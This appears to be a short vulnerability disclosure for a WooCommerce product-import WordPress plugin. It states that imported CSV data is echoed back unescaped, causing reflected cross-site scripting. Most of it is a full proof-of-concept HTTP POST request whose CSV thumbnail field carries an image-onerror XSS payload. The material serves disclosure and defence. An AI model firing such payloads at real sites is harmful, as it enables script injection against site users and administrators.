The plugin does not sanitise and escape the imported data before outputting it back in the page, leading to a Reflected Cross-Site Scripting
POST /wp-admin/admin.php?page=woo_pi&tab=import HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------26500037853062016269678995697
Content-Length: 1234
Connection: close
Cookie: [logged in admin]
Upgrade-Insecure-Requests: 1
-----------------------------26500037853062016269678995697
Content-Disposition: form-data; name="upload_method"
upload
-----------------------------26500037853062016269678995697
Content-Disposition: form-data; name="csv_file"; filename="a.csv"
Content-Type: text/csv
Name,Content,Price,Gender,sku,Multi_cat,Thumbnail
Pumpkin spice cupcake, Pumpkin spice cupcake 3",5.99, Bakery,128,Dessert,<img src onerror=alert(/XSS/)>
-----------------------------26500037853062016269678995697
Content-Disposition: form-data; name="csv_file_ftp[passive]"
auto
-----------------------------26500037853062016269678995697
Content-Disposition: form-data; name="delimiter"
,
-----------------------------26500037853062016269678995697
Content-Disposition: form-data; name="category_separator"
|
-----------------------------26500037853062016269678995697
Content-Disposition: form-data; name="parent_child_delimiter"
>
-----------------------------26500037853062016269678995697
Content-Disposition: form-data; name="action"
upload
-----------------------------26500037853062016269678995697
Content-Disposition: form-data; name="page_options"
csv_file
-----------------------------26500037853062016269678995697--